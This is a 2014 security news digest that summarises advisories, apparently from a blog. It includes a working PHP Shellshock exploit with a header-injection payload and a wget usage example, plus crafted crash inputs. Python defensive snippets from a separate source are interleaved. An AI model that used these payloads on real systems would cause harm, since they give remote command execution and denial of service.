September 22, 2014, 1:42 pm
A terabyte stream of anonymized DNS data collected every day from around the world reveals lots of interesting things. Nominum researchers have developed algorithms to sort through trillions of transactions and find what is usually a tiny fraction that aren't legitimate. Some are queries for controlling malware, some are to send spam, and most recently lots more queries are for DDoS.
A recent trend we're seeing is attackers sending carefully crafted queries targeting a small set of domains each day.
more here: http://www.circleid.com/posts/20140922_digging_deep_into_dns_data_discloses_damaging_domains/
September 22, 2014, 1:45 pm
As discussed in parts 1 and 2 of this series, the most common VPN endpoints (responders) found supporting Aggressive Mode negotiation are Cisco devices. However, they are also almost always supported by a second factor authentication mechanism known as XAUTH. I originally wrote a shell script that leverages VPNC, one of the command line VPN clients discussed in this post, to brute force valid XAUTH credentials. Then I decided to write it all out from scratch in Python, but I lost interest for a few months and put it on the backburner. Anyway, I've finished the tool now.
more here: http://blog.spiderlabs.com/2014/09/cracking-ike-missionimprobable-part3.html
September 22, 2014, 1:47 pm
In my previous blog, I talked about a method for acquiring bare-metal images directly from NAND Flash memory. In that post, I used a Verifone POS device as my reverse engineering example. The next step is to dissect the image and change it into a more meaningful form for our investigation. Let’s start with making sense of the out-of-band (OOB) data from the image and removing bad blocks. After that, we will have a flat image that can be used for further analysis.
more here: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Reverse-engineering-NAND-Flash-Memory-POS-device-case-study-part/ba-p/6627072
September 23, 2014, 2:29 am
A couple of weeks ago, Adobe released security bulletin APSB14-21, including 8 fixes for bugs reported by Project Zero. Full details of these bugs are now public in our bug tracker. Some of the more interesting ones are a double free in the RTMP protocol, or an integer overflow concatenating strings. Again, we’d like to thank Adobe for a response time well ahead of our standard 90-day disclosure deadline.
The focus of this post is an integer overflow leading to a buffer overflow in an ActionScript API.
more here: http://googleprojectzero.blogspot.com/2014/09/exploiting-cve-2014-0556-in-flash.html
September 23, 2014, 2:34 am
I've been meaning to review Mean IO for some time and finally found the time to take a quick look at it.
I was really happy to see that Mean IO is using PBKDF2 for password hashing before storing it. It's using a 16 byte salt created using crypto.randomBytes and it's using 10000 rounds with a keylength of 64 bytes.
The password policy is however pretty weak.
more here: https://github.com/eoftedal/writings/blob/master/published/mean_io-review.md
September 23, 2014, 3:37 am
Flash bugs include: Flash leak of uninitialized data whilst rendering JPEGs; Flash leak of uninitialized data whilst rendering a 2-component JPEG; Flash leak of uninitialized memory when rendering valid(?) 1bpp image; Flash heap buffer overflow calling copyPixelsToByteArray() on a large ByteArray; Flash leak of uninitialized data when image zlib stream ends prematurely; Flash leak of uninitialized data when JPEG image alpha channel zlib stream ends prematurely; and more.
more here: https://code.google.com/p/google-security-research/issues/list?can=1&q=flash&colspec=ID+Type+Status+Priority+Milestone+Owner+Summary&cells=tiles
September 23, 2014, 8:19 am
-------------------------------------------------------------------------
X2Engine <= 4.1.7 (SiteController.php) PHP Object Injection Vulnerability
-------------------------------------------------------------------------

[-] Software Link:

http://www.x2engine.com/

[-] Affected Versions:

All versions from 2.8 to 4.1.7.

[-] Vulnerability Description:

The vulnerable code is located in the "actionSendErrorReport" method defined in /protected/controllers/SiteController.php:

153.    public function actionSendErrorReport(){
154.        if(isset($_POST['report'])){
155.            $errorReport = $_POST['report'];
156.            $errorReport = unserialize(base64_decode($errorReport));
157.            if(isset($_POST['email'])){
158.                $errorReport['email'] = $_POST['email'];
159.            }

User input passed through the "report" POST parameter is not properly sanitized before being used in a call to the "unserialize()" function at line 156. This can be exploited to inject arbitrary PHP objects into the application scope, and could allow an attacker to carry out Server-Side Request Forgery (SSRF) and possibly other attacks via specially crafted serialized objects.

[-] Solution:

Apply the vendor patch or update to version 4.2 or later.

[-] Disclosure Timeline:

[31/07/2014] - Vendor notified
[31/07/2014] - Vendor released security patch: http://x2community.com/?showtopic=1804
[01/08/2014] - CVE number requested
[16/08/2014] - CVE number assigned
[05/09/2014] - Version 4.2 released
[23/09/2014] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2014-5297 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Original Advisory:

http://karmainsecurity.com/KIS-2014-09
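As an added illustration (not X2Engine's code or the vendor's patch), the decoder below reproduces the advisory's base64-then-unserialize flow in Python but accepts only scalar and array tokens and refuses the O:/C: object tokens, which is the effect of PHP >= 7's unserialize($data, ['allowed_classes' => false]) turned into a hard reject; the two sample reports are constructed.

```python
import base64

def decode_error_report(b64: str):
    """Base64-decode then unserialize, as X2Engine does, but refuse objects.

    Only N/i/b/d/s/a tokens are accepted, the same effect PHP >= 7 gets from
    unserialize($data, ['allowed_classes' => false]), turned into a reject."""
    data = base64.b64decode(b64).decode("latin-1")  # one char per byte
    value, pos = _parse(data, 0)
    if pos != len(data):
        raise ValueError("trailing bytes after serialized value")
    return value

def _parse(s, i):
    tag = s[i]
    if tag == "N":                                      # N;
        return None, i + 2
    if tag in "ibd":                                    # i:42; b:1; d:1.5;
        end = s.index(";", i)
        conv = {"i": int, "b": lambda v: v == "1", "d": float}[tag]
        return conv(s[i + 2:end]), end + 1
    if tag == "s":                                      # s:5:"hello";
        colon = s.index(":", i + 2)
        n, start = int(s[i + 2:colon]), colon + 2
        if s[colon + 1] != '"' or s[start + n:start + n + 2] != '";':
            raise ValueError("malformed string at offset %d" % i)
        return s[start:start + n], start + n + 2
    if tag == "a":                                      # a:2:{k v k v}
        colon = s.index(":", i + 2)
        n, i, out = int(s[i + 2:colon]), colon + 2, {}  # colon + 2 skips ':{'
        for _ in range(n):
            key, i = _parse(s, i)
            out[key], i = _parse(s, i)
        if s[i] != "}":
            raise ValueError("unterminated array at offset %d" % i)
        return out, i + 1
    if tag in "OC":  # object / custom-serialized object: the injection vector
        raise ValueError("object token %r refused at offset %d" % (tag, i))
    raise ValueError("unknown tag %r at offset %d" % (tag, i))

def report_is_safe(b64: str) -> bool:
    """True only when the report decodes to plain data (no objects)."""
    try:
        decode_error_report(b64)
        return True
    except (ValueError, IndexError):  # refused object, malformed or truncated
        return False

# Constructed samples: a benign report and one carrying an object token.
BENIGN_REPORT = base64.b64encode(b'a:1:{s:5:"error";s:4:"oops";}').decode()
OBJECT_REPORT = base64.b64encode(b'O:8:"stdClass":0:{}').decode()
```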
September 23, 2014, 8:20 am
--------------------------------------------------------------------------------
X2Engine <= 4.1.7 (FileUploadsFilter.php) Unrestricted File Upload Vulnerability
--------------------------------------------------------------------------------

[-] Software Link:

http://www.x2engine.com/

[-] Affected Versions:

Version 4.1.7 and probably prior versions.

[-] Vulnerability Description:

The vulnerability exists because of the FileUploadsFilter::EXT_BLACKLIST constant, which is a regular expression for blacklisted files. Due to a lack of case-insensitive matching, the global upload filter could be bypassed by uploading a malicious file with capital letters within the extension. This can be exploited to upload and execute arbitrary PHP scripts if X2Engine is running on a case-insensitive filesystem or if the web server is configured to handle files' extensions in a case-insensitive fashion.

[-] Solution:

Update to version 4.2 or later.

[-] Disclosure Timeline:

[01/08/2014] - Vendor notified
[02/08/2014] - CVE number requested
[16/08/2014] - CVE number assigned
[05/09/2014] - Version 4.2 released
[23/09/2014] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2014-5298 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Original Advisory:

http://karmainsecurity.com/KIS-2014-10
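The filter defect above, shown as an added Python example (not X2Engine's code; the blacklist pattern is a constructed stand-in, not the real EXT_BLACKLIST): the same regex with and without case-insensitive matching, next to the allowlist check that avoids the problem class entirely.

```python
import re

# Constructed stand-in for an extension blacklist of the kind the advisory
# describes; the real FileUploadsFilter::EXT_BLACKLIST is not reproduced here.
BLACKLIST_WEAK = re.compile(r"\.(php|phtml|php[345]|phps|pl|cgi)\Z")
# Same pattern with case-insensitive matching: "shell.PHP" is now caught.
BLACKLIST_FIXED = re.compile(BLACKLIST_WEAK.pattern, re.IGNORECASE)
# Stronger still: an allowlist of the extensions the application actually needs.
ALLOWED = {"png", "jpg", "jpeg", "gif", "pdf", "txt", "csv"}

def blocked_by(pattern, filename: str) -> bool:
    """True when the blacklist regex rejects the filename."""
    return pattern.search(filename) is not None

def allowed_by_allowlist(filename: str) -> bool:
    """Accept only when the last extension, compared case-insensitively, is known."""
    _, dot, ext = filename.rpartition(".")
    return bool(dot) and ext.lower() in ALLOWED

def verdicts(filename: str) -> dict:
    """Side-by-side result of the three checks for one upload name."""
    return {
        "weak_blacklist_blocks": blocked_by(BLACKLIST_WEAK, filename),
        "fixed_blacklist_blocks": blocked_by(BLACKLIST_FIXED, filename),
        "allowlist_accepts": allowed_by_allowlist(filename),
    }

# Constructed upload names: one benign, then the case-variant bypass the
# advisory describes. Only the weak blacklist lets the capitalised ones through.
SAMPLE_NAMES = ["photo.png", "shell.php", "shell.PHP", "shell.pHp"]
```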
September 23, 2014, 10:08 am
Last year, when the iPhone 5S was released, I showed how you could hack its fancy new TouchID fingerprint sensor. A year and one iPhone 6 later, I’ve done it again.
When the iPhone 6 came out the first thing I wanted to find out was whether or not there had been any changes to the TouchID sensor. I had little expectation that the TouchID sensor would be completely secure, but I hoped at least that there would have been some improvements.
more here: https://blog.lookout.com/blog/2014/09/23/iphone-6-touchid-hack/
September 23, 2014, 10:10 am
On September 18, 2014, RiskIQ detected credential-stealing malware being loaded onto users’ computers through a drive-by download at jQuery.com. The attack was carried out using RIG exploit kit to target visitors. RiskIQ was able to confirm with sources at several large organizations that users of jQuery.com were indeed redirected to this exploit kit.
more here: http://www.riskiq.com/resources/blog/jquerycom-malware-attack-puts-privileged-enterprise-it-accounts-risk#.VCGpQfldWSo
September 23, 2014, 11:41 am
We published an article on SSD forensics in 2012. SSD self-corrosion, TRIM and garbage collection were little known and poorly understood phenomena at that time, while encrypting and compressing SSD controllers were relatively uncommon. In 2014, many changes happened. We processed numerous cases involving the use of SSD drives and gathered a lot of statistical data. We now know more about many exclusions from SSD self-corrosion that allow forensic specialists to obtain more information from SSD drives.
more here: http://articles.forensicfocus.com/2014/09/23/recovering-evidence-from-ssd-drives-in-2014-understanding-trim-garbage-collection-and-exclusions/
September 23, 2014, 12:32 pm
Advisory Information
====================

Vendors Contacted: TP-LINK
Vendor Patched: Yes, Firmware 140916
System Affected: N750 Wireless Dual Band Gigabit Router (TL-WDR4300), might affect others.
Versions Affected: 130617, possibly earlier
CVE Numbers Assigned: CVE-2014-4727, CVE-2014-4728

Vulnerabilities Description
===========================

# Stored XSS -
It is possible to inject JavaScript code via the DHCP hostname field. If the administrator visits the DHCP clients page (web panel), the script will execute.

# DoS (web server) -
Denial of service condition in the device web server, remotely or locally: send the device a "GET" request with an extra header with a long value ("A" x 3000 times).

Proof of Concept:
=================

http://elisyan.com/tplink/wdr4300.html
http://elisyan.com/tplink/wdr4300.py

Report Timeline:
================

2014-07-04: Vendor notified about the vulnerabilities with all the relevant technical information.
2014-09-16: Vendor released a fix.

Credits:
========

The vulnerabilities were discovered by Oz Elisyan.

References:
===========

http://www.tp-link.com/lk/products/details/?model=TL-WDR4300
September 23, 2014, 1:26 pm
CVE-2014-6603 suricata 2.0.3 Out-of-bounds access in SSH application parser

1. Background

Suricata is a high performance Network IDS, IPS and Network Security Monitoring engine developed by the Open Information Security Foundation (OISF).

2. Summary Information

It was found that the application parser for SSH integrated in Suricata contains a flaw that might lead to an out-of-bounds access. For this reason a Denial of Service against the Suricata monitoring software might be possible using crafted packets on the monitoring interface.

3. Technical Description

The application parser for SSH (src/app-layer-ssh.c) contains a function SSHParseBanner. In case the parsed buffer is either

"SSH-2.0\r-MySSHClient-0.5.1\n"

or

"SSH-2.0-\rMySSHClient-0.5.1\n"

the function will behave in the wrong way and attempt either a very big memory allocation or an out-of-bounds array access with a negative index, which also might lead to out-of-bounds write access under certain conditions. The problem is caused by the fact that the end of the banner and the start of the software version are computed independently.

4. Affected versions

Affected versions are Suricata 2.0.3 and 2.1beta1; older versions might be affected as well.

5. Fix

The issue will be fixed in Suricata 2.0.4 and in the next upcoming major release. See http://suricata-ids.org/2014/09/23/suricata-2-0-4-available/ for reference.

6. Advisory Timeline

2014-09-10: Discovered
2014-09-12: Reported to vendor by email
2014-09-12: Vendor responded, confirmed and provided preliminary fix
2014-09-17: Requested CVE
2014-09-19: CVE number received
2014-09-23: Vendor reported a fixed version released
2014-09-23: Published

7. Credit

The issue was found by Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de

8. References

http://www.openinfosecfoundation.org/
http://suricata-ids.org/
http://suricata-ids.org/2014/09/23/suricata-2-0-4-available/
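The parsing rule behind the advisory, as an added Python example (not Suricata's code, which is C in src/app-layer-ssh.c): the line is delimited first and the version separator is searched only inside it, so the two crafted banners quoted above are rejected instead of yielding a negative length; independent_offsets() shows the flawed shape the advisory describes, with both offsets found separately over the whole buffer.

```python
def parse_ssh_banner(buf: bytes):
    """Return (protoversion, softwareversion) for a complete RFC 4253 banner
    line, or None when it is incomplete or malformed.

    The separator search is confined to the already delimited line, so the
    version field cannot start after the line ends."""
    if not buf.startswith(b"SSH-"):
        return None
    # 1. Delimit the line first: CR or LF, whichever comes first.
    ends = [i for i in (buf.find(b"\r"), buf.find(b"\n")) if i != -1]
    if not ends:
        return None                       # no terminator yet: need more data
    line = buf[:min(ends)]                # nothing past the terminator is used
    # 2. Find the '-' separating protoversion from softwareversion INSIDE it.
    dash = line.find(b"-", 4)
    if dash == -1:
        return None                       # "SSH-2.0\r-MySSHClient..." lands here
    proto = line[4:dash]
    software = line[dash + 1:].split(b" ", 1)[0]   # drop optional comments
    if not proto or not software:
        return None                       # "SSH-2.0-\rMySSHClient..." lands here
    return proto.decode("ascii", "replace"), software.decode("ascii", "replace")

def independent_offsets(buf: bytes):
    """The flawed shape the advisory describes: banner end and software
    version start are located separately over the whole buffer.

    Returns (version_start, banner_end). With start > end the derived length
    is negative, which in C becomes a negative index or, cast to an unsigned
    size, a huge allocation. Assumes a terminated banner."""
    banner_end = min(i for i in (buf.find(b"\r"), buf.find(b"\n")) if i != -1)
    version_start = buf.find(b"-", 4) + 1
    return version_start, banner_end

# The two banners quoted in the advisory plus a well-formed one (constructed).
CRAFTED_BANNERS = (b"SSH-2.0\r-MySSHClient-0.5.1\n", b"SSH-2.0-\rMySSHClient-0.5.1\n")
GOOD_BANNER = b"SSH-2.0-OpenSSH_6.6p1 Ubuntu-2ubuntu2\r\n"
```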
September 23, 2014, 3:25 pm
TripAdvisor has suffered a data breach at its Viator tour-booking and review website.
An estimated 1.4 million Viator customers are potentially affected by the compromise, which the firm admits may have exposed payment card data.
more here: http://www.theregister.co.uk/2014/09/23/tripadvisor_subsidiary_viator_breach_card_fraud_link/?mt=1411511103040
September 23, 2014, 3:27 pm
How'd that malware get there?
That's the question you've got to answer for every OSX malware infection. We built OSXCollector to make that easy. Quickly parse its output to get an answer.
more here: https://github.com/Yelp/osxcollector
September 24, 2014, 2:17 am
Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Today's example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version - TS070563_092012_MODEL_862_GW
more here: http://console-cowboys.blogspot.de/2014/09/arris-cable-modem-backdoor-im.html
September 24, 2014, 4:28 am
The Acrobat Reader Windows sandbox is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions. This could be used to break out of the sandbox leading to execution at higher privileges.
The specific vulnerability is in the handling of the NtSetInformationFile system call hook. This function attempts to resolve the real destination of the rename. If the destination is a junction it reads the junction destination, however it only does this for the first level so it's possible to have a chain of junctions. This allows code in the sandbox to write an arbitrary file to the filesystem.
more here: https://code.google.com/p/google-security-research/issues/detail?id=94&can=1
September 24, 2014, 7:48 am
Bash, or the Bourne-again shell, is a UNIX-like shell which is perhaps one of the most installed utilities on any Linux system. From its creation in 1980, bash has evolved from a simple terminal-based command interpreter to many other fancy uses.
In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consist of a name which has a value assigned to it. The same is true of the bash shell. It is common for a lot of programs to run the bash shell in the background. It is often used to provide a shell to a remote user (via ssh, telnet, for example), provide a parser for CGI scripts (Apache, etc.) or even provide limited command execution support (git, etc.).
Coming back to the topic, the vulnerability arises from the fact that you can create environment variables with specially crafted values before calling the bash shell. These variables can contain code, which gets executed as soon as the shell is invoked. The name of these crafted variables does not matter, only their contents.
more here: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
September 24, 2014, 1:50 pm
The iOS 8 security update bulletin has many fixed bugs, one of which is this one “A double free issue existed in the handling of Mach ports. This issue was addressed through improved validation of Mach ports. CVE-2014-4375 : an anonymous researcher”.
Well, I've known this bug for a while and it was insanely fun as an anti-debugging measure because of its random effects when triggered. For example, sometimes you get an immediate kernel panic, other times nothing happens, and most of the time you get weird CPU spikes not attributed to any process, or system lock-ups after a while. Used as an anti-debugging measure this is extremely fun, because the attacker will suffer from totally random events and the bug is easy to hide in plain sight.
The following sample code will trigger it.
more here: http://reverse.put.as/2014/09/24/the-double-free-mach-port-bug-the-short-story-of-a-dead-0day/
September 25, 2014, 12:29 am
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
Test CGI Code : #!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Bash-is-Vulnerable"
*/
error_reporting(0);
if(!defined('STDIN')) die("Please run it through command-line!\n");
$x = getopt("u:c:");
if(!isset($x['u']) || !isset($x['c']))
{
    die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
}
$url = $x['u'];
$cmd = $x['c'];
$context = stream_context_create(
    array(
        'http' => array(
            'method' => 'GET',
            'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
        )
    )
);
if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0)
    die("Command sent to the server!\n");
else
    die("Connection Error\n");
?>
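Defender-side counterpart to the Red Hat description and the PoC script above, as an added example that comes from neither source: every request header is checked for the bash function-export marker, because a CGI server exports each header as an environment variable and bash does not care about the variable's name, only its value; the sample requests are constructed.

```python
import re

# The marker bash looked for when importing a function from the environment:
# "() {" at the start of a value. Anything after the closing brace of that
# function body was executed on startup, which is the injection the advisory
# and the PoC above rely on.
FUNCTION_MARKER = re.compile(r"^\s*\(\)\s*\{")
TRAILING_CODE = re.compile(r"^\s*\(\)\s*\{.*?\}\s*;?\s*(.*)$", re.S)

def inspect_header(name: str, value: str):
    """Return the trailing code if the header value is a bash function export,
    "" when the marker is present without a payload, None when it is clean."""
    if not FUNCTION_MARKER.match(value):
        return None
    m = TRAILING_CODE.match(value)
    return m.group(1).strip() if m else ""

def scan_request(headers):
    """Scan every header, not just User-Agent: mod_cgi exports each one as
    HTTP_<NAME>, so Cookie, Referer and the rest reach bash the same way."""
    hits = []
    for name, value in headers:
        code = inspect_header(name, value)
        if code is not None:
            hits.append((name, code))
    return hits

# Constructed request headers: an ordinary browser request and a probe
# carrying the marker in two different headers.
SAMPLE_REQUEST = [
    ("Host", "www.example.test"),
    ("User-Agent", "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"),
    ("Accept", "text/html"),
]
SAMPLE_PROBE = [
    ("Host", "www.example.test"),
    ("User-Agent", '() { :;}; /bin/bash -c "echo probe"'),
    ("Cookie", "() { :; }; echo vulnerable"),
    ("Referer", "http://www.example.test/"),
]
```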
The information contained within this publication is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts responsibility for any damage caused by the use or misuse of this information.